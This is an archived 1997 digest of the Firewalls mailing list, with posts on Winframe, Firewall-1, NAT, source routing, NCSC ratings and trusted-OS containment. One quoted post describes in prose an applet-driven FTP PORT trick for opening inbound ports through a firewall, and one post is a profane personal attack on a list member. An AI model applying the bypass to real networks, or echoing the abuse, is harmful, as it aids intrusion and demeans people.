From firewalls-owner Mon Jan 6 00:29:04 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA18163 for firewalls-outgoing; Mon, 6 Jan 1997 00:15:01 -0800 (PST) Received: from malraux.matranet.com (malraux.matranet.com [194.117.213.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id AAA18153 for ; Mon, 6 Jan 1997 00:14:42 -0800 (PST) Received: (from uucp@localhost) by malraux.matranet.com (8.7.4/8.7.3) id JAA07370; Mon, 6 Jan 1997 09:03:55 +0100 (MET) Received: from verlaine.imatranet.com(192.0.2.2) by malraux.matranet.com via smap (3.2) id xma007366; Mon, 6 Jan 97 09:03:38 +0100 Received: from kafka.imatranet.com ([192.0.2.22]) by verlaine.imatranet.com (post.office MTA v2.0 0813 ID# 0-29132U60) with ESMTP id AAA228; Mon, 6 Jan 1997 09:12:19 +0100 From: "Xavier Fauquet" To: "Jamie Thain" , "Mike Bernhardt" , "Ralph Docken" , , "Chris Lonvick" Subject: Re: Using Remote Workstation as Hole?? Date: Mon, 6 Jan 1997 00:49:13 +0100 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Message-ID: <19970106081219047.AAA228@kafka.imatranet.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Could someone point me to a site explaining what Winframe is?

Thanks

----------
> From: Jamie Thain
> To: Mike Bernhardt ; Ralph Docken ; Firewalls@GreatCircle.COM; Chris Lonvick
> Subject: Re: Using Remote Workstation as Hole??
> Date: mercredi 1 janvier 1997 01:12
>
> Chris,
>
> > I don't want to seem altogether pessimistic on the subject - but I do think
> > that a very determined person can crack any system, given enough time. Even
> > Mike's systems are not invulnerable. It would just take a very determined
> > person to get through his defenses - using electronic means.
>
> I agree, however what if you put a machine like a Winframe in your DMZ, and
> force all outside connections through that machine. The Winframe uses a
> proprietary protocol, ICA, that is encrypted, and then encrypting the
> outside machine stream. Winframe can be configured such that it auto
> disconnects, has no virtual resources other than a screen, and requires the
> client to logon 100% of the time. Although the password is passed across
> the wire, if it is in a VPN there are effectively three layers of
> scrambling/encryption at that point.
>
> The protocol ICA
> The Winframe encryption,
> The protocol encryption.
>
> But there is always the cold war method... hold a gun to the person's head
> on the outside, while they retrieve data from the machine, or steal the
> tapes... ...
>
> Comments on the security of Winframe?
>
> regards:jamie

From firewalls-owner Mon Jan 6 00:44:46 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA18536 for firewalls-outgoing; Mon, 6 Jan 1997 00:26:28 -0800 (PST) Received: from sunphil.sunphil.mozcom.com (sunphil.mozcom.com [206.151.138.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id AAA18522 for ; Mon, 6 Jan 1997 00:25:51 -0800 (PST) Received: by sunphil.sunphil.mozcom.com (SMI-8.6/SMI-SVR4) id QAA18062; Mon, 6 Jan 1997 16:24:31 -0800 Date: Mon, 6 Jan 1997 16:24:31 -0800 From: drexx@sunphil.mozcom.com (Dexter D. Laggui) Message-Id: <199701070024.QAA18062@sunphil.sunphil.mozcom.com> To: firewalls@greatcircle.com, dwee@singapore.sun.com Subject: FW-1 throughput? Etc. X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hello world,

I would be very much obliged if anybody can please answer this:

1] How many packets per second can the Solstice Firewall-1 2.1 (installed on a Sun Sparcstation 20 with Solaris 2.5) process? In Mbps terms?

2] Current needs dictate a solution involving FWs with multiple secure VPNs to mobile customers.
I like the capabilties of FW-1 2.1 very much but I understand that it does not support VPN today. Do I really need the SunScreen EFS to complement it? 3] Who do I talk to in Sun Singapore for FW and SunScreen training? What is the mailing list for Checkpoint/Solstice Firewall-1 users? Thank you very much for your kindness. :-) Yours, Dexter D. Laggui Systems Engineer drexx@sunphil.mozcom.com Philippine Systems Products Inc. ----- End Included Message ----- From firewalls-owner Mon Jan 6 04:14:19 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA29252 for firewalls-outgoing; Mon, 6 Jan 1997 04:00:24 -0800 (PST) Received: from sonda.cl (mail.sonda.cl [200.6.65.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id DAA29158 for ; Mon, 6 Jan 1997 03:59:59 -0800 (PST) Received: by guardia.sonda.cl id <24196>; Mon, 6 Jan 1997 09:02:45 -0300 Posted-Date: Mon, 6 Jan 1997 08:57:14 -0300 Date: Mon, 6 Jan 1997 02:47:07 -0300 Message-Id: <97Jan6.090245cdt.24196@guardia.sonda.cl> From: m_fliguer@sonda.cl (Miguel Fliguer - Troppus Erawtfos) To: firewalls@GreatCircle.COM Subject: Re: Air Force Web Site Hacked X-VMS-To: SMTP%"firewalls@GreatCircle.com" X-VMS-Cc: M_FLIGUER Sender: firewalls-owner@GreatCircle.COM Precedence: bulk uskanbye@ibmmail.com wrote : >>> [snip snip snip] >>> Physical read-only storage may offer SOME protection, but still >>> not hackproof (not to mention the probable performance penalty >>> you'd pay for optical. Let's go one step further and make the website ROM-based ;-) Even better, let's put the pages on some sort of non-volatile RAM with a "Write Enable" jumper. Then, when a page change is needed, we'll only need to open the case, put the jumper on, make the changes, remove the jumper, close the case... All performance problems inherent to CD-ROM speed are gone !!! :-) Sorry, it was stronger than myself.... 
Regards, Miguel m_fliguer@scomp1.sonda.cl From firewalls-owner Mon Jan 6 04:59:09 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA01273 for firewalls-outgoing; Mon, 6 Jan 1997 04:52:44 -0800 (PST) Received: from linda.if.is (linda.if.is [193.4.185.193]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id EAA01244 for ; Mon, 6 Jan 1997 04:52:23 -0800 (PST) Received: from ilmur.if.is by linda.if.is (Secure/IFnet/18-11-96); Mon, 6 Jan 1997 12:24:58 GMT Received: by ilmur.if.is (Secure/IFnet/09-12-96); Mon, 6 Jan 1997 12:57:20 GMT From: gunni@if.is (Gunnar Ingvi Thorisson) Message-Id: <199701061257.MAA32657@ilmur.if.is> Subject: Re: Air Force Web Site Hacked To: m_fliguer@sonda.cl (Miguel Fliguer - Troppus Erawtfos) Date: Mon, 6 Jan 1997 12:57:18 +0000 (GMT) Cc: firewalls@GreatCircle.COM In-Reply-To: <97Jan6.090245cdt.24196@guardia.sonda.cl> from "Miguel Fliguer - Troppus Erawtfos" at Jan 6, 97 02:47:07 am X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >>> [snip snip snip] > >>> Physical read-only storage may offer SOME protection, but still > >>> not hackproof (not to mention the probable performance penalty > >>> you'd pay for optical. > > Let's go one step further and make the website ROM-based ;-) Even > better, let's put the pages on some sort of non-volatile RAM with > a "Write Enable" jumper. Then, when a page change is needed, we'll > only need to open the case, put the jumper on, make the changes, > remove the jumper, close the case... All performance problems > inherent to CD-ROM speed are gone !!! :-) > > Sorry, it was stronger than myself.... > > Regards, > Miguel > m_fliguer@scomp1.sonda.cl I think this thread is getting OFF-TOPIC, please stop talking about this Air-Force web page hacking. 
Once the hacker enters the site he changes the Document root to NFS mounted directory from the other side of the world! Thank you, Gunnar Ingvi Thorisson Iceland Software Inc. - gunni@if.is Coda (Financials) Iceland - gunni@coda.is From firewalls-owner Mon Jan 6 05:59:09 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA03627 for firewalls-outgoing; Mon, 6 Jan 1997 05:47:42 -0800 (PST) Received: from aragorn.kingston.net (aragorn.kingston.net [205.189.48.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id FAA03608 for ; Mon, 6 Jan 1997 05:47:31 -0800 (PST) Received: (from uucp@localhost) by aragorn.kingston.net (8.6.12/8.6.12) with UUCP id JAA26252 for firewalls@GreatCircle.COM; Mon, 6 Jan 1997 09:01:02 -0500 Received: from ent106-ppp by empire.ca (SMI-8.6/SMI-SVR4) id TAA12111; Sat, 4 Jan 1997 19:34:42 -0500 Date: Sat, 4 Jan 1997 19:34:42 -0500 From: citpaj@aragorn.kingston.net (Paul Jenkins) Message-Id: <199701050034.TAA12111@empire.ca> To: firewalls@GreatCircle.COM Subject: Mailing List Cc: firewalls@GreatCircle.COM X-Mailer: Pronto E-Mail [version 2.01] MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk As the Postmaster at empire.ca, I've noticed a lot of Firewall related mail from your site, addressed to Keith Grant, who used to work at our Company. As Keith is no longer with the Company, can you please remove him from your mailing list, so as we cease to be inundated with this mail about firewalls. It's a pain for me to have to watch it build, and then delete it occassionally, let alone the waste of disk space at our ISP and here at our site. Look forward to receiving your co-operation on this one. 
Thanks, Paul Jenkins From firewalls-owner Mon Jan 6 08:54:50 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA10345 for firewalls-outgoing; Mon, 6 Jan 1997 08:15:33 -0800 (PST) Received: from monet.mingpaoxpress.com (babbage.mingpaoxpress.com [205.150.120.3]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA10312 for ; Mon, 6 Jan 1997 08:15:07 -0800 (PST) Received: by www.mingpaoxpress.com id <1929-10805>; Mon, 6 Jan 1997 11:14:33 -0500 Received: by www.mingpaoxpress.com id <1928-10808>; Mon, 6 Jan 1997 11:14:18 -0500 Path: acli Subject: Re: Re[2]: NT NAT Distribution: local Organization: Ming Pao Daily News (Canada) Message-ID: References: <9701050100.AA02172@sonic.nmti.com.nmti.com> Date: Mon, 6 Jan 1997 16:14:08 GMT From: Ambrose Li To: firewalls@greatcircle.com Reply-To: Ambrose Li Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In article <9701050100.AA02172@sonic.nmti.com.nmti.com>, Peter da Silva wrote: >> If I am using for example Linux, would it be enough to >> configure the linux kernel to drop source routed packets? > >I don't know. It's a sysctl option in FreeBSD. In Linux you have to recompile your kernel to turn on/off source routing. -- Ambrose Li. acli@mingpaoxpress.com. Ming Pao Newspapers (Canada) Ltd., EDP department. 1355 Huntingwood Drive, Scarborough, Ontario, M1S 3J1, Canada. Voice +1 416 321 0088 x272 Fax +1 416 321 9663. 
My favourite OS has yet no From firewalls-owner Mon Jan 6 08:58:34 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA10916 for firewalls-outgoing; Mon, 6 Jan 1997 08:35:38 -0800 (PST) Received: from arden.iss.net (arden.iss.net [204.241.60.8]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA10878 for ; Mon, 6 Jan 1997 08:34:48 -0800 (PST) Received: (from mhw@localhost) by arden.iss.net (8.8.4/8.7.3) id MAA06710; Mon, 6 Jan 1997 12:33:46 -0500 From: Michael Warfield Message-Id: <199701061733.MAA06710@arden.iss.net> Subject: Re: Christopher Klaus and ISS To: lists@reflections.mindspring.com (Todd Graham Lewis) Date: Mon, 6 Jan 1997 12:33:46 -0500 (EST) Cc: firewalls@greatcircle.com In-Reply-To: from "Todd Graham Lewis" at Dec 31, 96 09:04:36 pm X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk My appolgies in advance to Brent and the other denizens on this list for raising the noise level on this subject but I feel, as a personal afront, this should not stand unchallenged... In this matter, I am speaking solely for myself and my personal opinion and NOT for Internet Security Systems, Inc. I took this last week to research issues brought up in these two messages. I asked other engineers as Internet Security Systems not to reply to these messages until I had completed my research and had replied myself. On Tue, 31 Dec 1996 Todd Graham Lewis enscribed thusly: > On Mon, 23 Dec 1996, Feeney, Tim wrote: > > Well since Mr. Klaus refuses to play by the rules I would like to see > > all mail from iss.net bounced back to them. I realize that some people > > want to see what they have to offer but there are plenty of "HELP" posts > > to this list that Mr. Klaus can put his (and his company's) two cents > > in. 
He instead insists on posting non-solicited marketing dribble to a > > list that already has quite a volume. Any comments or seconds? I reviewed the archives for the firewalls mailing list for all of 1996 looking for postings by Chris. In that last year there have been a grand total of 18 messages. Five of these were "Re:'s" replying to someone else's questions or information. Several of them were providing security related information or commentary on such subjects as the InfoWorld firewalls comparison and Dan Farmers security survey. One was a announcement that ISS would make an alpha version of some of our development software available free to combat the raging SYN flood problem that was occuring at that time. Several ISP's used that software to successfully abate crippling SYN flood attacks. Two messages, in December, were product announcements. Chris has played by the rules. He posted a grand total of two "Announcements" clearly labeled as such and both on products very relevant to security and firewalls. One is even a product being actively used to test firewalls. Commercial, yes, but no more commercial than hundreds (yes I said hundreds and I mean hundreds) of other commercial messages that have appeared on this list. His one "sin" was that one of the messages was excessive and he should have posted a URL in a short message rather than the longer announcement. When I mentioned that matter to him he agreed that he had made a mistake on that and that he was wrong there. His mistakes are ones of enthusiasm more than anything else. He is rightfully proud of what we have created and continue to create. He has actually behaved much better than some of the other slime who have attempted to use underhanded, thinly veiled excuses, to get their commercial messages across. 
Let's NOT forget "Dr Fredrick Cohen, PhD" and his piles and piles of messages, some relevant, some not, some trivial to the point of ridiculous, and some even destructive (remember his suggestion to "cut the wire to the record head on the floppy drive to make it read only" :-) ), that were used as a vehicle to plaster us with his advertisement signatures. That continued unabated for months until Brent was finally forced to pull the plug on Ol' Freddy... His nonsense got so bad it prompted some of the members of this list to include signatures which read "So you've got a PhD, just don't touch anything". That was well over a year ago (probably before your time Todd, so you're excused) and I STILL see that sig line showing up all over the place. We are talking about two, TWO, (yes Todd even you can count to two) announcements, both of which were topic relavent, for new products which could well have been of interest to the participants on this list. And unlike many other messages posted to this list, they were clearly and appropriately labeled as "Announcements". > I've never found Klaus to be helpful at anything other than selling his > product and treating his employees like crap. The second point is > really unrelated to the motion, but mentioning it makes me feel better > about seconding that Klaus be banished. I read this message last Tuesday and went on an immediate hunt to figure out just what you were talking about. Every employee I talked to at ISS wants me to ask you some burning questions... WHAT DRUGS ARE YOU ON AND WHERE CAN WE BUY SOME?!?!? Since you are obviously not high on reality, we've all come to the conclusion that you must be participating seriously in some better living through modern chemistry! I even checked with some of our ex-employees. I've had three whole engineers out of our entire staff leave for other, bigger, positions. Nobody seems to know what the F*CK you are talking about. What's more, most of us have never heard of you. 
A few of us, myself included, did hear you speak in front of the Atlanta Linux Enthusiasts meeting a while ago. My opinion of you at this point is that you have hit a new all time low and you've started to dig! Since all of the messages Chris has posted have been on security and firewalls related topics and the vast majority have been non-commercial, I've come to the conclusion that your first point is either a bald-face lie or sheer blatant ignorance (or, I suspect, BOTH). Where you came up with that "second" point is totally and absolutely beyond any of us! Seeing as the vast majority of ISS employees don't even know who the F*CK you are (and those of us who do now wish we didn't), this claim is total and complete bullshit! You have absolutely no knowlege of the working conditions at ISS (which in my 30 years of participation in Corporate America are by far some of the best). Perhaps there IS another motive here though. Several times in the past, Mindspring has been soliciting for engineers at the Atlanta Unix Users Group. Being one of the resident "gurus" there for over eight years, I have also been looking for engineers to add to my staff at those meetings. Some of you even asked me, one night, why I hadn't signed on over at Mindspring. Perhaps this has more to do with your recruitment attempts than anything to do with this list. Make it sound like ISS is not such a good place to work for and maybe you would have a better shot at recruiting around AUUG? > __ > Todd Graham Lewis Linux! Core Engineering > Mindspring Enterprises tlewis@mindspring.com (800) 719 4664, x2804 On Wed, 1 Jan 1997 Todd Graham Lewis enscribed thusly: > On Tue, 31 Dec 1996, Robert Hanson wrote: > > no disrespect intended to you Todd, yet.... Naw - go ahead. Intend the disrespect he deserves... He's earned it! > > kill! maime! shoot! my goodness... we are all capitalist pigs... what > > makes anyone better than anyone else standing next to them... 
> I not only like corporations, I work for one. Believe it or not, I don't > even have a problem with vendors discussing their products on the list. > Those who offer help to newbies, contribute to technical discussions, > etc., are more than entitled to mention once in a while "BTW (disclaimer: > I work for 'em), our product X is designed to address this problem", or > even to say "In light of the discussion last month, I thought that the > list might be interested in our new product, SuperBlammo4000." > What I don't appreciate are bone-headed sales pitches coming from people > who never participate in the discussions on the list, and whose sole > purpose is to use the list as a free advertising channel. Chris Klaus is not a sales person. Quite the contrary, he's an engineer, who wrote and released the "shareware" version of ISS long before Dan Farmer announced SATAN. That version is still available from CERT. He does have the common sense NOT to post just for the sake of posting. He posts when he has something to contribute to the list, either to an existing discussion or providing new information. This list would be a terribly empty (but noisy) place if anyone with commercial information were forbidden to mention it in mixed company. Chris Klaus has made serious contributions to the state of the art in network security. This is far more than anyone can say about you. > I don't think that this is too far off the mark, and the fact that Klaus > is a complete asshole just makes the decision that much easier. Off the mark? You aren't even on the same plain of reality. Chris Klaus doesn't know you and you don't know him. I do know both of you and as far as assholes go, I would rather work FOR Chris Klaus than WITH an asshole like you! You really need to see a doctor about that case of optical rectitus. It's begining to look like it's on steroids now. 
It's no wonder that, having had your head up your ass so deep and for so long, that you now have such a shitty outlook on life. > (BTW, I'm sorry I wasn't able to participate in the discussion about Linux > firewalls. I was visiting family during the holidays.) > __ > Todd Graham Lewis Linux! Core Engineering > Mindspring Enterprises tlewis@mindspring.com (800) 719 4664, x2804 Regards, Mike -- Michael H. Warfield | Voice: (770)395-0150x123 (770)552-4823 Senior Engineer | Fax: (770)395-1972 Internet Security Systems, Inc. | E-Mail: mhw@iss.net mhw@wittsend.com 41 Perimeter Center East, Suite 660 | http://www.iss.net/ Atlanta, GA 30328 | http://www.wittsend.com/mhw/ PGP Key: 0xDF1DD471 http://www.wittsend.com/mhw/pubkey.txt From firewalls-owner Mon Jan 6 09:50:37 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA13703 for firewalls-outgoing; Mon, 6 Jan 1997 09:39:26 -0800 (PST) Received: from pcslink.com (pcslink.com [206.43.160.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id JAA13695 for ; Mon, 6 Jan 1997 09:39:13 -0800 (PST) Received: (from ryan@localhost) by pcslink.com (8.8.3/8.6.12) id KAA16417; Mon, 6 Jan 1997 10:38:28 -0700 (MST) From: Ryan Mooney Message-Id: <199701061738.KAA16417@pcslink.com> Subject: Re: Re[2]: NT NAT To: peter@baileynm.com (Peter da Silva) Date: Mon, 6 Jan 1997 10:38:27 -0700 (MST) Cc: ckn@findata.se, firewalls@GreatCircle.COM In-Reply-To: <9701041543.AA00908@sonic.nmti.com.nmti.com> from "Peter da Silva" at Jan 4, 97 09:43:54 am X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > > Please correct me if I'm wrong here but I was under the impression that > > the 192.168.x.x-addresses was 'non-routable' or whatever the term is. > > Under what circumstances can an external intruder gain access to my > > internal 192.168.x.x-machines? > > Source routed packets. 
> Which can and should be turned off in the router/and/or/IP Masq box. which should also do such obvious things as filter out packets to the inside addresses claiming to be from the inside... etc... this is basic stuff that you should do with EVERY firewalled enviroment IMHO. NAT with some decent filters is IMNSHO just above straight filters and straight through proxies in the security sense. Really the next level is to have a proxy that understands the protocol and can interperet the data stream for "bad things" (ie: the fwtk patches to gw-http that can filter based on tags and disallow active X, Java, etc..). If you think a stand alone straight through proxy is more secure than a good filter set on a newer routre OS, you've been drinking the vendor cool-aid. Again a proxy that understands the application data stream can be more secure. This goes back to some earlier statements that other people have alluded to, and that is the case of "Good Enough Security". If you have a billion dollars you are trying to protect, you'd better nail things down pretty damn tight. On the other hand if you are trying to protect a 1K/mo charity you'd scale things back a bit. You can't just say "This is THE solution", you have to look at the situation, analyze it, and THEN you can say "this is good enough security, here". Appropriate solutions for appropriate problems. I think to many people here get caught up in finding the 100% secure solution, this may or may not be practical in all enviroments (both from an economic and usability standpoint). That said, NAT can be an important part of an overall security scheme and may/should be coupled with other security measures including router filters, and perhaps some appropriate proxies. It is not THE solution, nothing is THE solution, they are all pieces and parts that need to be use appropriately. 
---------------------------------------------------------------------------- Ryan Mooney Phone (602)265-9188 PCSLink ryan@pcslink.com Fax (602)265-9357 Internet Services The world needs more bitter, twisted souls. It would be a much better place. ----------------------------------------------------------------------------- From firewalls-owner Mon Jan 6 11:11:33 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA18124 for firewalls-outgoing; Mon, 6 Jan 1997 10:44:55 -0800 (PST) Received: from computer.mindspring.com (computer.mindspring.com [204.180.142.145]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id KAA18086 for ; Mon, 6 Jan 1997 10:44:35 -0800 (PST) Received: (from ahobson@localhost) by computer.mindspring.com (8.8.4/8.8.4) id NAA00630; Mon, 6 Jan 1997 13:43:35 -0500 (EST) From: Andrew Hobson To: Michael Warfield Cc: firewalls@greatcircle.com Subject: Re: Christopher Klaus and ISS References: <199701061733.MAA06710@arden.iss.net> Mime-Version: 1.0 (generated by tm-edit 7.96) Content-Type: text/plain; charset=US-ASCII Date: 06 Jan 1997 13:43:35 -0500 In-Reply-To: Michael Warfield's message of Mon, 6 Jan 1997 12:46:28 EST Message-ID: Lines: 25 X-Mailer: Red Gnus v0.73/XEmacs 19.15 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'd like only one small clarification. I make no comment on the flame fest. On Mon, 6 Jan 1997 12:46:28 EST, Michael Warfield said: > Perhaps there IS another motive here though. Several times in the > past, Mindspring has been soliciting for engineers at the Atlanta Unix Users > Group. Being one of the resident "gurus" there for over eight years, I have > also been looking for engineers to add to my staff at those meetings. Some > of you even asked me, one night, why I hadn't signed on over at Mindspring. > Perhaps this has more to do with your recruitment attempts than anything to > do with this list. 
Make it sound like ISS is not such a good place to work > for and maybe you would have a better shot at recruiting around AUUG? I make no comment about Todd's post. He was, most certainly, speaking for himself and *not* MindSpring. If Todd was bad mouthing ISS in order to recruit for MindSpring, then that's unacceptable. I'll ask Todd to refrain from speaking about ISS. Drew -- "Joe, release me from your Kung-Fu grip." -- Stacy Lavelle From firewalls-owner Mon Jan 6 11:29:09 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA20474 for firewalls-outgoing; Mon, 6 Jan 1997 11:20:42 -0800 (PST) Received: from mail2.visi.net (geneva.visi.net [204.71.248.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA20467 for ; Mon, 6 Jan 1997 11:20:29 -0800 (PST) Received: from LOCALNAME (ppp-1-39.nn.visi.net [206.246.196.39]) by mail2.visi.net (8.8.4/12000) with SMTP id OAA12182; Mon, 6 Jan 1997 14:16:59 -0500 (EST) Date: Mon, 6 Jan 1997 14:16:59 -0500 (EST) Message-Id: <199701061916.OAA12182@mail2.visi.net> X-Sender: rodrcc@mail.visi.net X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: "Richard F. Trezza" From: Information Systems Security Officer Subject: Re: Firewall Security Ratings Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 01:01 PM 12/27/96 -0500, you wrote: >Greetings, > >Does anyone know of a URL or other Internet resource where I can verify >firewall vendor claims regarding U.S. Government computer security >ratings. Specifically, the so-called B1 and B2 classifications issued by >the National Computer Security Center? > >Happy New Year and thanks in advance. > > Richard The address that you seek is www.radium.ncsc.mil/tpep/. This is the listing for and about the Trusted Product Evaluation Program. 
From firewalls-owner Mon Jan 6 12:40:22 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA23990 for firewalls-outgoing; Mon, 6 Jan 1997 12:28:26 -0800 (PST) Received: from news.ptes.com (NEWSHOST.PTES.COM [138.112.199.10]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id MAA23973 for ; Mon, 6 Jan 1997 12:28:15 -0800 (PST) Received: from [138.112.190.103] (mike.ptes.com [138.112.190.103]) by news.ptes.com (8.8.4/8.8.4) with SMTP id MAA05228; Mon, 6 Jan 1997 12:26:26 -0800 (PST) X-Sender: mike@pescadero.ptes.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 6 Jan 1997 12:29:00 -0900 To: Todd Graham Lewis , Ken Hardy From: mike@ptes.com (Mike Bernhardt) Subject: Re: Untrusted vs. trusted network security Cc: Firewalls Mailing List Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >On Fri, 20 Dec 1996, Ken Hardy wrote: > >> The problem is ... >> >> The applet opens a connection back to its home system on port 21, the >> FTP port. The firewall allows outgoing FTP, so that's fine. The >> applet then issues a PORT command on the FTP channel to tell the remote >> FTP server to make a connection to a data socket that it's opened on >> some other port, as per the FTP protocol spec. The firewall, which >> normally prevents all inbound connections, sees the PORT command and >> opens that port to the applet's machine for the incoming FTP transfer. >> >> But the firewall is unable to know that the commands are coming from an >> applet and not a "real" FTP client, and the applet used port 23 >> (telnet) or 25 (smtp) or 139 (netbios) in the PORT command. So now the >> blackhat's system has an open channel to the chosen port on the machine >> running the applet. Firewall? What firewall? > >Port command? What port command? > >Virtually all modern ftp clients support the passive option. I force my >users to use it for just this reason, and I haven't heard too many >complaints. 
> >Proxying return FTP connections is going too far in the direction of >appeasing the user. > Isn't this the benefit of using more than one means of protection? A simple packet filter close this hole, by simply not allowing any inbound traffic to port 23. For example, our packet filtering allows NO inbound traffic to ports <1024, except for certain services to certain hosts. So no matter what the firewall thinks is OK, the packet filter won't let it through. I would think the problem described above is due more to misconfiguration than to a real "hole." If I'm wrong, please correct me, someone. ------------------------------------------------------------- "He who dies with the most toys, still dies." From firewalls-owner Mon Jan 6 13:42:46 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA26777 for firewalls-outgoing; Mon, 6 Jan 1997 13:08:44 -0800 (PST) Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id NAA26532 for ; Mon, 6 Jan 1997 13:02:16 -0800 (PST) Received: from splinter.rtp.dg.com by dg-rtp.dg.com (5.4R3.10/dg-rtp-v02) id AA23842; Mon, 6 Jan 1997 16:00:58 -0500 Received: by splinter.rtp.dg.com (8.6.10/200.15.1.2) id QAA10279; Mon, 6 Jan 1997 16:00:38 -0500 From: spencerj@dg-rtp.dg.com (Jon Spencer) Message-Id: <199701062100.QAA10279@splinter.rtp.dg.com> Subject: Re: NCSA != NCSC To: ckaplan@nohackers.com Date: Mon, 6 Jan 1997 16:00:33 -0500 (EST) Cc: firewalls@greatcircle.com In-Reply-To: <19961230094439.02e47f85.in@cbk.nohackers.com> from "ckaplan@nohackers.com" at Dec 30, 96 04:44:39 am X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > I have to say up front that I agree with MJR. > > Hardening and creativity in your OS are great for a firewall, however a NCSC > just isn't directly enough applicable. 
> > >Can you explain how the "hardened" OS helps? If the firewall
> >software is implemented below the OS layer (e.g.: some kind
> >of adaptive filtering or whatever) then the OS will never even "see"
> >the traffic at all and whether it's an evaluated OS or not is
> >completely irrelevant. If the firewall software is purely application
>
> I don't even think that this is a totally valid argument in MOST implementations.
>
> True that in a MLSI firewall this conceptually is true, however people love
> to add 'stuff' to their firewalls. Stuff like mail handlers, DNS servers,
> HTTPDs, etc.. As soon as they do that this stuff becomes the weak link in
> their system.
> While I would imagine that some exist I don't think I have seen any yet
> configured as solo systems.
>
> The villain exploits one of the above and is then on the box. At that point
> a trusted OS is unlikely to help. Those processes all too often are run as
> root (Yes I know that they shouldn't, don't need to, could fork, etc...but I
> am talking what far too many people end up running) and leave the villain
> free to go on in.

Well, true and not true. (To be redundant, anything below B2/E4 is not trustworthy.) Just because an OS is high assurance (B2/E4 and above), this doesn't mean that it protects against all things. At best, it only does what it claims to do and no more.

To solve this stated problem, the claim must be that you can run untrusted software in a specific "area" such that if the untrusted software is penetrated, the damage is limited to the maximum authority available in the "area" the software was running in. This concept is included in B2 DG/UX and is called "containment." The claim is that when a user enters the system, a maximum "containment area" is assigned to him which can never be extended. When a user is connected to a service such as a web server, that web server is running in the user's containment area when it services the user.

(In brief, the concept of containment is that the system is divided into two parts, that which exists for the user and that which simply does not exist for the user, so there is no way to get to it. Containment is further divided into "sub-containment" areas which define the access rights the user has - read only, write only, read write, etc. This applies to both objects AND to operations. Operations are things like halting the system, stopping auditing, changing a user profile, etc. There are an arbitrary number of containment areas on a system, and they do not have to be predefined - you roll them as you go.)

Thus, if the application breaks, and the user escapes to some user interface (shell, CLI, etc.), the user has no more authority than he had in the application, and he has no way to gain any more, regardless of what passwords he knows or what smart cards he possesses or whatever. Even operating system applications (init, login, etc.) cannot break containment - that is the only way that containment could possibly work.

So a high assurance containment OS CAN provide what is being asked for. And when you run web servers and Java interpreters on the high assurance containment OS, it doesn't matter whether it is Unix (as is DG/UX) or NT or ABC. Go look at DG next time you are at a trade show.

BTW, I am the security architect for DG and architected this OS, so this information is correct. Of course, every father's child is beautiful and intelligent! :-)

>
> How about an OS that fingerprinted all its apps, or added extra file
> attributes (not generatable during run-time operation) that were necessary
> for execution. Then if the kernel didn't see this stuff it shuts down.
> This way you could delete from the PRODUCTION system all likely tools
> (chown, chmod, telnet, rxx, mknod, ifconfig, route, etc) and if the villain
> tried to add his/her own the box would croak. I would take that type of
